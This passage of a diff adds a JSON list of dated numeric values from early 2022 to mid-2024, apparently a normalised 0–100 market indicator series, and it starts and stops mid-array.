70.80000262740342 + ], + [ + "2022-01-27", + 69.90703075738485 + ], + [ + "2022-01-28", + 94.0576839886989 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 99.04213259417483 + ], + [ + "2022-02-02", + 99.8005592230089 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 100.0 + ], + [ + "2022-02-07", + 99.6011261201595 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 99.49619057512999 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 99.19494013335371 + ], + [ + "2022-02-17", + 100.0 + ], + [ + "2022-02-18", + 95.32385770171618 + ], + [ + "2022-02-22", + 95.57591845026018 + ], + [ + "2022-02-23", + 95.90908731297306 + ], + [ + "2022-02-24", + 100.0 + ], + [ + "2022-02-25", + 100.0 + ], + [ + "2022-02-28", + 93.27378937298624 + ], + [ + "2022-03-01", + 85.97646934788563 + ], + [ + "2022-03-02", + 88.0064458106716 + ], + [ + "2022-03-03", + 88.01670031155605 + ], + [ + "2022-03-04", + 78.04374258826321 + ], + [ + "2022-03-07", + 85.39905443168637 + ], + [ + "2022-03-08", + 85.33144684095134 + ], + [ + "2022-03-09", + 95.31521959115624 + ], + [ + "2022-03-10", + 91.15317083572461 + ], + [ + "2022-03-11", + 90.79891977065753 + ], + [ + "2022-03-14", + 87.04023477132995 + ], + [ + "2022-03-15", + 95.63076730006048 + ], + [ + "2022-03-16", + 100.0 + ], + [ + "2022-03-17", + 100.0 + ], + [ + "2022-03-18", + 97.20037934334545 + ], + [ + "2022-03-21", + 96.22683613609466 + ], + [ + "2022-03-22", + 97.23420341591516 + ], + [ + "2022-03-23", + 93.63973685798712 + ], + [ + "2022-03-24", + 89.93864833738348 + ], + [ + "2022-03-25", + 88.75251627862967 + ], + [ + "2022-03-28", + 89.90201062126603 + ], + [ + "2022-03-29", + 88.64266863742559 + ], + [ + "2022-03-30", + 88.9294827648327 + ], + [ + "2022-03-31", + 88.89603337839027 + ], + [ + "2022-04-01", + 86.80128074080268 + ], + [ + "2022-04-04", + 74.83680987746109 + ], + [ + "2022-04-05", + 80.23935732538213 + ], + [ + "2022-04-06", + 77.92110851029891 + ], + [ + "2022-04-07", + 76.38685626269638 + ], + [ + "2022-04-08", + 74.00316729982951 + ], + [ + "2022-04-11", + 75.71138030265911 + ], + [ + "2022-04-12", + 69.57575574151656 + ], + [ + "2022-04-13", + 61.08229573737688 + ], + [ + "2022-04-14", + 64.67188959511856 + ], + [ + "2022-04-18", + 60.31598349646144 + ], + [ + "2022-04-19", + 64.94132349729742 + ], + [ + "2022-04-20", + 62.63664073327775 + ], + [ + "2022-04-21", + 64.08679644383263 + ], + [ + "2022-04-22", + 63.01497583132818 + ], + [ + "2022-04-25", + 65.4523011069806 + ], + [ + "2022-04-26", + 70.60190939248248 + ], + [ + "2022-04-27", + 65.73031229688478 + ], + [ + "2022-04-28", + 80.1651077424068 + ], + [ + "2022-04-29", + 90.21560837737373 + ], + [ + "2022-05-02", + 93.51458434209412 + ], + [ + "2022-05-03", + 88.56543997914243 + ], + [ + "2022-05-04", + 97.21863461245293 + ], + [ + "2022-05-05", + 100.0 + ], + [ + "2022-05-06", + 99.77599074145581 + ], + [ + "2022-05-09", + 100.0 + ], + [ + "2022-05-10", + 100.0 + ], + [ + "2022-05-11", + 100.0 + ], + [ + "2022-05-12", + 96.24076942728459 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.89002660366674 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 99.39482670066101 + ], + [ + "2022-05-20", + 97.808636397352 + ], + [ + "2022-05-23", + 98.47073339758263 + ], + [ + "2022-05-24", + 95.19951728891908 + ], + [ + "2022-05-25", + 96.45536605862276 + ], + [ + "2022-05-26", + 94.28928660453411 + ], + [ + "2022-05-27", + 92.23884622626628 + ], + [ + "2022-05-31", + 91.068277335902 + ], + [ + "2022-06-01", + 91.20632536467139 + ], + [ + "2022-06-02", + 89.55498388403774 + ], + [ + "2022-06-03", + 81.9111915543498 + ], + [ + "2022-06-06", + 81.44381698480134 + ], + [ + "2022-06-07", + 73.76035468767152 + ], + [ + "2022-06-08", + 73.65327586341415 + ], + [ + "2022-06-09", + 72.89488333799875 + ], + [ + "2022-06-10", + 79.28589446778327 + ], + [ + "2022-06-13", + 81.37913669104366 + ], + [ + "2022-06-14", + 81.37320713743333 + ], + [ + "2022-06-15", + 81.06587309655134 + ], + [ + "2022-06-16", + 77.95399606731714 + ], + [ + "2022-06-17", + 79.00193640595046 + ], + [ + "2022-06-21", + 82.39437310989017 + ], + [ + "2022-06-22", + 80.89544855533933 + ], + [ + "2022-06-23", + 80.15638339611935 + ], + [ + "2022-06-24", + 84.87999322558065 + ], + [ + "2022-06-27", + 81.6007248968529 + ], + [ + "2022-06-28", + 79.47459173516826 + ], + [ + "2022-06-29", + 79.56459769039455 + ], + [ + "2022-06-30", + 79.78715521271724 + ], + [ + "2022-07-01", + 75.41020419052076 + ], + [ + "2022-07-05", + 75.18751648400507 + ], + [ + "2022-07-06", + 75.36759212919254 + ], + [ + "2022-07-07", + 77.45514377398493 + ], + [ + "2022-07-08", + 77.40622659512516 + ], + [ + "2022-07-11", + 76.10771685371039 + ], + [ + "2022-07-12", + 70.39917766852949 + ], + [ + "2022-07-13", + 58.084455409141476 + ], + [ + "2022-07-14", + 58.096552408661104 + ], + [ + "2022-07-15", + 56.62984660582331 + ], + [ + "2022-07-18", + 44.99957257111048 + ], + [ + "2022-07-19", + 48.96321372992462 + ], + [ + "2022-07-20", + 47.015135638590635 + ], + [ + "2022-07-21", + 47.50229956460812 + ], + [ + "2022-07-22", + 49.80639406488248 + ], + [ + "2022-07-25", + 42.545488403021025 + ], + [ + "2022-07-26", + 45.17279372189584 + ], + [ + "2022-07-27", + 48.61064326135146 + ], + [ + "2022-07-28", + 48.720795629510796 + ], + [ + "2022-07-29", + 47.94422183213287 + ], + [ + "2022-08-01", + 48.212440578122724 + ], + [ + "2022-08-02", + 47.671316437541144 + ], + [ + "2022-08-03", + 50.78774118617029 + ], + [ + "2022-08-04", + 49.20231883612656 + ], + [ + "2022-08-05", + 50.18980831428163 + ], + [ + "2022-08-08", + 46.000051910126025 + ], + [ + "2022-08-09", + 46.38780723189021 + ], + [ + "2022-08-10", + 49.11735480235697 + ], + [ + "2022-08-11", + 49.93616772408602 + ], + [ + "2022-08-12", + 50.13844435973544 + ], + [ + "2022-08-15", + 48.76173521487571 + ], + [ + "2022-08-16", + 45.471046652954 + ], + [ + "2022-08-17", + 46.21888971160952 + ], + [ + "2022-08-18", + 45.47399723980744 + ], + [ + "2022-08-19", + 46.12261387944843 + ], + [ + "2022-08-22", + 50.81419911348984 + ], + [ + "2022-08-23", + 47.34194626165566 + ], + [ + "2022-08-24", + 35.69542597750847 + ], + [ + "2022-08-25", + 37.25939528266207 + ], + [ + "2022-08-26", + 47.240333166692864 + ], + [ + "2022-08-29", + 47.7676987698569 + ], + [ + "2022-08-30", + 48.34362969540075 + ], + [ + "2022-08-31", + 42.150309351181484 + ], + [ + "2022-09-01", + 41.724951073278355 + ], + [ + "2022-09-02", + 42.32991287613378 + ], + [ + "2022-09-06", + 42.400845023881025 + ], + [ + "2022-09-07", + 45.93997212447758 + ], + [ + "2022-09-08", + 39.47292264330388 + ], + [ + "2022-09-09", + 43.97283999294785 + ], + [ + "2022-09-12", + 42.17105731705719 + ], + [ + "2022-09-13", + 58.00044184013326 + ], + [ + "2022-09-14", + 59.001468336321224 + ], + [ + "2022-09-15", + 59.5210927454181 + ], + [ + "2022-09-16", + 58.73383123085616 + ], + [ + "2022-09-19", + 58.71906652832122 + ], + [ + "2022-09-20", + 55.9129585098751 + ], + [ + "2022-09-21", + 57.013291803200595 + ], + [ + "2022-09-22", + 56.92713848053077 + ], + [ + "2022-09-23", + 53.83156818273436 + ], + [ + "2022-09-26", + 46.04783539594185 + ], + [ + "2022-09-27", + 46.10255981754926 + ], + [ + "2022-09-28", + 49.690378778724195 + ], + [ + "2022-09-29", + 53.47488442362226 + ], + [ + "2022-09-30", + 54.270953745964846 + ], + [ + "2022-10-03", + 58.50960501803066 + ], + [ + "2022-10-04", + 64.99539196598597 + ], + [ + "2022-10-05", + 62.27422976214058 + ], + [ + "2022-10-06", + 62.018337217419585 + ], + [ + "2022-10-07", + 64.41542994848622 + ], + [ + "2022-10-10", + 62.38827464021783 + ], + [ + "2022-10-11", + 47.92149965314717 + ], + [ + "2022-10-12", + 46.89106806006473 + ], + [ + "2022-10-13", + 50.950468482314484 + ], + [ + "2022-10-14", + 55.14868101822671 + ], + [ + "2022-10-17", + 62.59308097884286 + ], + [ + "2022-10-18", + 63.26559843735563 + ], + [ + "2022-10-19", + 61.86153582300793 + ], + [ + "2022-10-20", + 61.324542787035284 + ], + [ + "2022-10-21", + 63.5278197564787 + ], + [ + "2022-10-24", + 64.0709336932686 + ], + [ + "2022-10-25", + 66.0468497369201 + ], + [ + "2022-10-26", + 66.977145673907 + ], + [ + "2022-10-27", + 64.44006918763043 + ], + [ + "2022-10-28", + 67.06652471952395 + ], + [ + "2022-10-31", + 65.49672161939672 + ], + [ + "2022-11-01", + 60.50332458883605 + ], + [ + "2022-11-02", + 66.49187481800274 + ], + [ + "2022-11-03", + 67.75621531508985 + ], + [ + "2022-11-04", + 62.2702831271192 + ], + [ + "2022-11-07", + 62.35613614551912 + ], + [ + "2022-11-08", + 60.937673597859046 + ], + [ + "2022-11-09", + 64.04044994137197 + ], + [ + "2022-11-10", + 87.943135162065 + ], + [ + "2022-11-11", + 83.6142650493614 + ], + [ + "2022-11-14", + 80.42820532038316 + ], + [ + "2022-11-15", + 80.8162017778405 + ], + [ + "2022-11-16", + 81.90557626124661 + ], + [ + "2022-11-17", + 81.69794969860546 + ], + [ + "2022-11-18", + 79.5301109042976 + ], + [ + "2022-11-21", + 79.02447862237435 + ], + [ + "2022-11-22", + 77.81711764874419 + ], + [ + "2022-11-23", + 75.38630312134416 + ], + [ + "2022-11-25", + 72.18412070996418 + ], + [ + "2022-11-28", + 67.23671614848448 + ], + [ + "2022-11-29", + 65.64164975931709 + ], + [ + "2022-11-30", + 75.27834554186248 + ], + [ + "2022-12-01", + 65.92156099313952 + ], + [ + "2022-12-02", + 62.17702014294756 + ], + [ + "2022-12-05", + 64.23709787222063 + ], + [ + "2022-12-06", + 63.794094676882054 + ], + [ + "2022-12-07", + 63.92196387861945 + ], + [ + "2022-12-08", + 59.384356356675006 + ], + [ + "2022-12-09", + 14.161408018309737 + ], + [ + "2022-12-12", + 11.73814484710957 + ], + [ + "2022-12-13", + 12.087106911596353 + ], + [ + "2022-12-14", + 10.729953374331322 + ], + [ + "2022-12-15", + 20.206656352051063 + ], + [ + "2022-12-16", + 20.885545922130817 + ], + [ + "2022-12-19", + 22.227687796848343 + ], + [ + "2022-12-20", + 21.625451116712018 + ], + [ + "2022-12-21", + 21.78373065903754 + ], + [ + "2022-12-22", + 24.44748243089053 + ], + [ + "2022-12-23", + 24.547672728089093 + ], + [ + "2022-12-27", + 24.445306734166714 + ], + [ + "2022-12-28", + 25.23231059323364 + ], + [ + "2022-12-29", + 7.589757618677165 + ], + [ + "2022-12-30", + 7.341265595660388 + ], + [ + "2023-01-03", + 7.410902438036926 + ], + [ + "2023-01-04", + 6.6842005984891175 + ], + [ + "2023-01-05", + 4.761604738827186 + ], + [ + "2023-01-06", + 14.472549431761808 + ], + [ + "2023-01-09", + 13.220358177102016 + ], + [ + "2023-01-10", + 14.314679240674735 + ], + [ + "2023-01-11", + 15.864028993310264 + ], + [ + "2023-01-12", + 14.77936327459336 + ], + [ + "2023-01-13", + 14.978436209185025 + ], + [ + "2023-01-17", + 2.2709845415891112 + ], + [ + "2023-01-18", + 2.950619207006778 + ], + [ + "2023-01-19", + 1.8588134118920698 + ], + [ + "2023-01-20", + 9.700385986221601 + ], + [ + "2023-01-23", + 12.367394701016666 + ], + [ + "2023-01-24", + 4.16946178257337 + ], + [ + "2023-01-25", + 4.541492840872706 + ], + [ + "2023-01-26", + 2.9770103930443015 + ], + [ + "2023-01-27", + 0.0 + ], + [ + "2023-01-30", + 3.9255315068065415 + ], + [ + "2023-01-31", + 4.965457771428992 + ], + [ + "2023-02-01", + 5.885960441868976 + ], + [ + "2023-02-02", + 14.413401783685268 + ], + [ + "2023-02-03", + 15.210406245578808 + ], + [ + "2023-02-06", + 13.812751602931412 + ], + [ + "2023-02-07", + 16.02114828710353 + ], + [ + "2023-02-08", + 22.012150657160728 + ], + [ + "2023-02-09", + 22.518654018574928 + ], + [ + "2023-02-10", + 23.66205757908848 + ], + [ + "2023-02-13", + 25.02758361411534 + ], + [ + "2023-02-14", + 25.06651777274362 + ], + [ + "2023-02-15", + 22.17751947039723 + ], + [ + "2023-02-16", + 25.601910666564308 + ], + [ + "2023-02-17", + 21.421098366025337 + ], + [ + "2023-02-21", + 23.96073510793928 + ], + [ + "2023-02-22", + 23.87942500237065 + ], + [ + "2023-02-23", + 24.24554589729282 + ], + [ + "2023-02-24", + 23.815784897847422 + ], + [ + "2023-02-27", + 23.402144428508556 + ], + [ + "2023-02-28", + 19.297385702357435 + ], + [ + "2023-03-01", + 17.618919154436703 + ], + [ + "2023-03-02", + 12.971536851152122 + ], + [ + "2023-03-03", + 3.323499452675313 + ], + [ + "2023-03-06", + 0.32757611694085775 + ], + [ + "2023-03-07", + 1.2705458675320025 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 1.1548934756532674 + ], + [ + "2023-03-13", + 1.9232442051725231 + ], + [ + "2023-03-14", + 5.4632170030381015 + ], + [ + "2023-03-15", + 5.033399243424841 + ], + [ + "2023-03-16", + 12.941199014919317 + ], + [ + "2023-03-17", + 9.101099555980754 + ], + [ + "2023-03-20", + 8.506967082065366 + ], + [ + "2023-03-21", + 2.6372608000445177 + ], + [ + "2023-03-22", + 5.739270751149009 + ], + [ + "2023-03-23", + 6.4302363857741005 + ], + [ + "2023-03-24", + 1.6917272401030883 + ], + [ + "2023-03-27", + 2.6382810108030403 + ], + [ + "2023-03-28", + 3.2237932408105276 + ], + [ + "2023-03-29", + 4.612795046194514 + ], + [ + "2023-03-30", + 4.733288738294071 + ], + [ + "2023-03-31", + 3.251215065601572 + ], + [ + "2023-04-03", + 3.6131398010802194 + ], + [ + "2023-04-04", + 0.9713091899080015 + ], + [ + "2023-04-05", + 3.453058680594 + ], + [ + "2023-04-06", + 0.0 + ], + [ + "2023-04-10", + 0.0 + ], + [ + "2023-04-11", + 1.4966885131912127 + ], + [ + "2023-04-12", + 0.0 + ], + [ + "2023-04-13", + 3.4444870679183692 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.014205739196340605 + ], + [ + "2023-04-19", + 0.0 + ], + [ + "2023-04-20", + 0.0 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.017108763205185454 + ], + [ + "2023-04-25", + 4.557678051905795 + ], + [ + "2023-04-26", + 4.4541407844732275 + ], + [ + "2023-04-27", + 9.380878372762158 + ], + [ + "2023-04-28", + 8.989632272313958 + ], + [ + "2023-05-01", + 5.790007961916787 + ], + [ + "2023-05-02", + 6.742177673390037 + ], + [ + "2023-05-03", + 7.132083006634048 + ], + [ + "2023-05-04", + 5.858003708203887 + ], + [ + "2023-05-05", + 10.498162048356146 + ], + [ + "2023-05-08", + 10.521194041026265 + ], + [ + "2023-05-09", + 10.519683541573583 + ], + [ + "2023-05-10", + 10.36398450566556 + ], + [ + "2023-05-11", + 6.395624936215248 + ], + [ + "2023-05-12", + 6.539539536609111 + ], + [ + "2023-05-15", + 6.753582232938543 + ], + [ + "2023-05-16", + 6.7428650267299055 + ], + [ + "2023-05-17", + 8.089428728641412 + ], + [ + "2023-05-18", + 9.774004722995778 + ], + [ + "2023-05-19", + 10.122475298375994 + ], + [ + "2023-05-22", + 9.912710672395422 + ], + [ + "2023-05-23", + 6.952811107209846 + ], + [ + "2023-05-24", + 8.061444381338255 + ], + [ + "2023-05-25", + 6.302482680902263 + ], + [ + "2023-05-26", + 12.759672057168864 + ], + [ + "2023-05-30", + 12.79639082758744 + ], + [ + "2023-05-31", + 12.29706869369648 + ], + [ + "2023-06-01", + 11.365110519896035 + ], + [ + "2023-06-02", + 10.521143693789265 + ], + [ + "2023-06-05", + 7.50310779219354 + ], + [ + "2023-06-06", + 7.8190520046657594 + ], + [ + "2023-06-07", + 12.697373745629017 + ], + [ + "2023-06-08", + 12.831735619226182 + ], + [ + "2023-06-09", + 12.809890630401558 + ], + [ + "2023-06-12", + 14.057498154892919 + ], + [ + "2023-06-13", + 14.12972685280242 + ], + [ + "2023-06-14", + 13.94345300188948 + ], + [ + "2023-06-15", + 13.898601241128954 + ], + [ + "2023-06-16", + 13.313540896267323 + ], + [ + "2023-06-20", + 13.199496919608219 + ], + [ + "2023-06-21", + 17.18314536665565 + ], + [ + "2023-06-22", + 14.00932573776954 + ], + [ + "2023-06-23", + 15.482720478671737 + ], + [ + "2023-06-26", + 13.522607426145738 + ], + [ + "2023-06-27", + 8.916124043630973 + ], + [ + "2023-06-28", + 8.815965719979008 + ], + [ + "2023-06-29", + 7.925660426344357 + ], + [ + "2023-06-30", + 8.91863689358045 + ], + [ + "2023-07-03", + 8.50872505023996 + ], + [ + "2023-07-05", + 8.561991048643398 + ], + [ + "2023-07-06", + 9.879321916262683 + ], + [ + "2023-07-07", + 4.819223721732155 + ], + [ + "2023-07-10", + 3.470557214747985 + ], + [ + "2023-07-11", + 3.529924200212757 + ], + [ + "2023-07-12", + 1.527195709804582 + ], + [ + "2023-07-13", + 4.582799111166193 + ], + [ + "2023-07-14", + 4.222195684326662 + ], + [ + "2023-07-17", + 3.521614475327496 + ], + [ + "2023-07-18", + 2.9744102576383247 + ], + [ + "2023-07-19", + 2.804748069993705 + ], + [ + "2023-07-20", + 9.203006137920177 + ], + [ + "2023-07-21", + 8.146820164352272 + ], + [ + "2023-07-24", + 6.18604159905343 + ], + [ + "2023-07-25", + 2.7033043822953142 + ], + [ + "2023-07-26", + 0.0 + ], + [ + "2023-07-27", + 0.3426287166488981 + ], + [ + "2023-07-28", + 4.314961919582368 + ], + [ + "2023-07-31", + 1.6164269644122893 + ], + [ + "2023-08-01", + 1.912901298682105 + ], + [ + "2023-08-02", + 9.99632573580521 + ], + [ + "2023-08-03", + 9.081340229804448 + ], + [ + "2023-08-04", + 9.254384764446598 + ], + [ + "2023-08-07", + 10.047325595292172 + ], + [ + "2023-08-08", + 11.058717604024066 + ], + [ + "2023-08-09", + 10.524473668909785 + ], + [ + "2023-08-10", + 5.912330716377298 + ], + [ + "2023-08-11", + 6.273766431206841 + ], + [ + "2023-08-14", + 6.9542039056072795 + ], + [ + "2023-08-15", + 6.361692180817739 + ], + [ + "2023-08-16", + 7.248414094567404 + ], + [ + "2023-08-17", + 1.649077314778734 + ], + [ + "2023-08-18", + 1.6639893889339945 + ], + [ + "2023-08-21", + 6.836730341000781 + ], + [ + "2023-08-22", + 5.671719054787525 + ], + [ + "2023-08-23", + 10.202544063172065 + ], + [ + "2023-08-24", + 15.864444716286819 + ], + [ + "2023-08-25", + 11.579239199312166 + ], + [ + "2023-08-28", + 12.835497632919738 + ], + [ + "2023-08-29", + 19.820154201715397 + ], + [ + "2023-08-30", + 14.37421216792987 + ], + [ + "2023-08-31", + 14.37199446785858 + ], + [ + "2023-09-01", + 14.046422727674532 + ], + [ + "2023-09-05", + 13.21036386151125 + ], + [ + "2023-09-06", + 13.27612026155493 + ], + [ + "2023-09-07", + 12.252828021191132 + ], + [ + "2023-09-08", + 12.240904856650308 + ], + [ + "2023-09-11", + 12.978319383513876 + ], + [ + "2023-09-12", + 13.321732647083792 + ], + [ + "2023-09-13", + 11.792319759880806 + ], + [ + "2023-09-14", + 10.16277909972892 + ], + [ + "2023-09-15", + 12.798717393346381 + ], + [ + "2023-09-18", + 12.668970433317602 + ], + [ + "2023-09-19", + 9.650843226291249 + ], + [ + "2023-09-20", + 12.76817562006644 + ], + [ + "2023-09-21", + 13.630020450061393 + ], + [ + "2023-09-22", + 7.345887231416608 + ], + [ + "2023-09-25", + 6.625062133816989 + ], + [ + "2023-09-26", + 8.305702051974343 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 0.8260819851748046 + ], + [ + "2023-09-29", + 0.470386558082749 + ], + [ + "2023-10-02", + 2.301164923603018 + ], + [ + "2023-10-03", + 5.682920797435935 + ], + [ + "2023-10-04", + 9.084167805163172 + ], + [ + "2023-10-05", + 8.706101622472216 + ], + [ + "2023-10-06", + 13.409295667324484 + ], + [ + "2023-10-09", + 11.711565860116657 + ], + [ + "2023-10-10", + 10.987823206379087 + ], + [ + "2023-10-11", + 11.610274981367166 + ], + [ + "2023-10-12", + 10.708133121588425 + ], + [ + "2023-10-13", + 8.871554693757295 + ], + [ + "2023-10-16", + 10.869785710816728 + ], + [ + "2023-10-17", + 10.947622893708637 + ], + [ + "2023-10-18", + 10.805703400965568 + ], + [ + "2023-10-19", + 6.637974010727656 + ], + [ + "2023-10-20", + 9.937672552882118 + ], + [ + "2023-10-23", + 9.754473134015967 + ], + [ + "2023-10-24", + 7.814192872354235 + ], + [ + "2023-10-25", + 16.10186861398677 + ], + [ + "2023-10-26", + 19.116226084206296 + ], + [ + "2023-10-27", + 19.600268027315348 + ], + [ + "2023-10-30", + 20.387334648692082 + ], + [ + "2023-10-31", + 17.43588313156939 + ], + [ + "2023-11-01", + 18.939479984323143 + ], + [ + "2023-11-02", + 22.63951769774939 + ], + [ + "2023-11-03", + 20.94426848537625 + ], + [ + "2023-11-06", + 20.834232504534636 + ], + [ + "2023-11-07", + 21.516799637166002 + ], + [ + "2023-11-08", + 20.950002377610378 + ], + [ + "2023-11-09", + 21.53813486329409 + ], + [ + "2023-11-10", + 24.88297973779606 + ], + [ + "2023-11-13", + 25.352516360462936 + ], + [ + "2023-11-14", + 30.367110284086984 + ], + [ + "2023-11-15", + 26.954910156517798 + ], + [ + "2023-11-16", + 25.175025234438902 + ], + [ + "2023-11-17", + 20.67826055383203 + ], + [ + "2023-11-20", + 21.970448838195882 + ], + [ + "2023-11-21", + 23.062818509192425 + ], + [ + "2023-11-22", + 10.488454051085858 + ], + [ + "2023-11-24", + 0.22754429825816025 + ], + [ + "2023-11-27", + 1.1343628590584725 + ], + [ + "2023-11-28", + 0.8083770882307091 + ], + [ + "2023-11-29", + 1.609406550072966 + ], + [ + "2023-11-30", + 0.0 + ], + [ + "2023-12-01", + 0.0 + ], + [ + "2023-12-04", + 1.5914565407285066 + ], + [ + "2023-12-05", + 1.543459644033259 + ], + [ + "2023-12-06", + 1.6477010794238331 + ], + [ + "2023-12-07", + 4.641132847571875 + ], + [ + "2023-12-08", + 2.602980185958788 + ], + [ + "2023-12-11", + 0.0 + ], + [ + "2023-12-12", + 0.12662404137454605 + ], + [ + "2023-12-13", + 0.0 + ], + [ + "2023-12-14", + 0.2232187669626627 + ], + [ + "2023-12-15", + 0.24237453738194256 + ], + [ + "2023-12-18", + 0.846198343846535 + ], + [ + "2023-12-19", + 0.0 + ], + [ + "2023-12-20", + 8.066712226174731 + ], + [ + "2023-12-21", + 10.716432138691635 + ], + [ + "2023-12-22", + 10.237628610616525 + ], + [ + "2023-12-26", + 10.25940297102608 + ], + [ + "2023-12-27", + 10.286844880262102 + ], + [ + "2023-12-28", + 10.198643688981473 + ], + [ + "2023-12-29", + 11.078322281932863 + ], + [ + "2024-01-02", + 22.126406963146913 + ], + [ + "2024-01-03", + 22.900434080605415 + ], + [ + "2024-01-04", + 24.203320511157912 + ], + [ + "2024-01-05", + 22.736460310663396 + ], + [ + "2024-01-08", + 27.899547433802933 + ], + [ + "2024-01-09", + 27.771101227454576 + ], + [ + "2024-01-10", + 27.179054928384478 + ], + [ + "2024-01-11", + 26.00345492257434 + ], + [ + "2024-01-12", + 22.80884685104049 + ], + [ + "2024-01-16", + 22.78722974144775 + ], + [ + "2024-01-17", + 23.54618258233557 + ], + [ + "2024-01-18", + 27.625352646912116 + ], + [ + "2024-01-19", + 35.71449247263886 + ], + [ + "2024-01-22", + 28.822688211063163 + ], + [ + "2024-01-23", + 26.72829498775967 + ], + [ + "2024-01-24", + 27.066636842427794 + ], + [ + "2024-01-25", + 26.607191574353884 + ], + [ + "2024-01-26", + 28.176440340700566 + ], + [ + "2024-01-29", + 29.78173471297978 + ], + [ + "2024-01-30", + 30.572030760183168 + ], + [ + "2024-01-31", + 33.30849242688958 + ], + [ + "2024-02-01", + 31.463659372854778 + ], + [ + "2024-02-02", + 34.01747907267993 + ], + [ + "2024-02-05", + 34.59676015737571 + ], + [ + "2024-02-06", + 27.970201937092025 + ], + [ + "2024-02-07", + 29.298966277869816 + ], + [ + "2024-02-08", + 28.998161396846434 + ], + [ + "2024-02-09", + 30.167242184378313 + ], + [ + "2024-02-12", + 31.235791601242262 + ], + [ + "2024-02-13", + 39.24338715743564 + ], + [ + "2024-02-14", + 39.11746578614477 + ], + [ + "2024-02-15", + 35.917923734883594 + ], + [ + "2024-02-16", + 31.166905927352605 + ], + [ + "2024-02-20", + 33.62859565978029 + ], + [ + "2024-02-21", + 33.805827683908745 + ], + [ + "2024-02-22", + 51.589930157655864 + ], + [ + "2024-02-23", + 51.96943531779809 + ], + [ + "2024-02-26", + 51.195834352372806 + ], + [ + "2024-02-27", + 49.90765530077111 + ], + [ + "2024-02-28", + 52.72322894795306 + ], + [ + "2024-02-29", + 43.63896594117652 + ], + [ + "2024-03-01", + 49.3960112658057 + ], + [ + "2024-03-04", + 47.92523359976597 + ], + [ + "2024-03-05", + 58.71101969581741 + ], + [ + "2024-03-06", + 59.25023850043991 + ], + [ + "2024-03-07", + 62.3893577495776 + ], + [ + "2024-03-08", + 69.15145548012278 + ], + [ + "2024-03-11", + 67.15294695489503 + ], + [ + "2024-03-12", + 71.77244350447265 + ], + [ + "2024-03-13", + 66.19522698266466 + ], + [ + "2024-03-14", + 63.95158268636432 + ], + [ + "2024-03-15", + 68.01271076617314 + ], + [ + "2024-03-18", + 73.46953707664925 + ], + [ + "2024-03-19", + 71.98578221350695 + ], + [ + "2024-03-20", + 74.08789790311396 + ], + [ + "2024-03-21", + 49.97513237645241 + ], + [ + "2024-03-22", + 49.415443124985636 + ], + [ + "2024-03-25", + 50.0203254948976 + ], + [ + "2024-03-26", + 50.48541725075728 + ], + [ + "2024-03-27", + 49.270326563392004 + ], + [ + "2024-03-28", + 47.67278520721446 + ], + [ + "2024-04-01", + 39.26080376049429 + ], + [ + "2024-04-02", + 41.619689778409224 + ], + [ + "2024-04-03", + 28.858961454057834 + ], + [ + "2024-04-04", + 37.51225135695731 + ], + [ + "2024-04-05", + 34.084293038471756 + ], + [ + "2024-04-08", + 25.443557897281423 + ], + [ + "2024-04-09", + 25.117479674854295 + ], + [ + "2024-04-10", + 19.314786808592977 + ], + [ + "2024-04-11", + 27.77985907246651 + ], + [ + "2024-04-12", + 38.26294970602047 + ], + [ + "2024-04-15", + 43.221302646261755 + ], + [ + "2024-04-16", + 39.398720048032445 + ], + [ + "2024-04-17", + 43.63870784648143 + ], + [ + "2024-04-18", + 36.823243963723264 + ], + [ + "2024-04-19", + 46.42156404400849 + ], + [ + "2024-04-22", + 52.03209066664007 + ], + [ + "2024-04-23", + 62.550293880232765 + ], + [ + "2024-04-24", + 63.491985792869066 + ], + [ + "2024-04-25", + 62.92616555216917 + ], + [ + "2024-04-26", + 72.35012701500709 + ], + [ + "2024-04-29", + 72.88144050893366 + ], + [ + "2024-04-30", + 80.1966152223058 + ], + [ + "2024-05-01", + 80.33250632202336 + ], + [ + "2024-05-02", + 80.48418429704398 + ], + [ + "2024-05-03", + 88.08782919548386 + ], + [ + "2024-05-06", + 91.56982962365691 + ], + [ + "2024-05-07", + 91.20788596956852 + ], + [ + "2024-05-08", + 89.18733882851487 + ], + [ + "2024-05-09", + 82.25404266564603 + ], + [ + "2024-05-10", + 75.01111153691778 + ], + [ + "2024-05-13", + 65.62291700329682 + ], + [ + "2024-05-14", + 66.2893594266503 + ], + [ + "2024-05-15", + 64.944593662463 + ], + [ + "2024-05-16", + 63.17409183387218 + ], + [ + "2024-05-17", + 43.34178745899963 + ], + [ + "2024-05-20", + 42.45096216245968 + ], + [ + "2024-05-21", + 37.79822773593992 + ], + [ + "2024-05-22", + 38.272000867031636 + ], + [ + "2024-05-23", + 38.02505399297456 + ], + [ + "2024-05-24", + 33.58704227260163 + ], + [ + "2024-05-28", + 33.560644202216174 + ], + [ + "2024-05-29", + 16.260610909225722 + ], + [ + "2024-05-30", + 20.353131645070768 + ], + [ + "2024-05-31", + 16.7901874294062 + ], + [ + "2024-06-03", + 0.6528772990095508 + ], + [ + "2024-06-04", + 0.0 + ], + [ + "2024-06-05", + 17.18142270709952 + ], + [ + "2024-06-06", + 17.11681945886298 + ], + [ + "2024-06-07", + 17.71749038261979 + ], + [ + "2024-06-10", + 17.785558462331053 + ], + [ + "2024-06-11", + 18.69280416826442 + ], + [ + "2024-06-12", + 23.05856412788721 + ], + [ + "2024-06-13", + 15.927055421146799 + ], + [ + "2024-06-14", + 15.121114005993116 + ], + [ + "2024-06-17", + 18.274723819796208 + ], + [ + "2024-06-18", + 18.098970842545196 + ], + [ + "2024-06-20", + 23.25326992917766 + ], + [ + "2024-06-21", + 24.304150584390204 + ], + [ + "2024-06-24", + 29.93519877146681 + ], + [ + 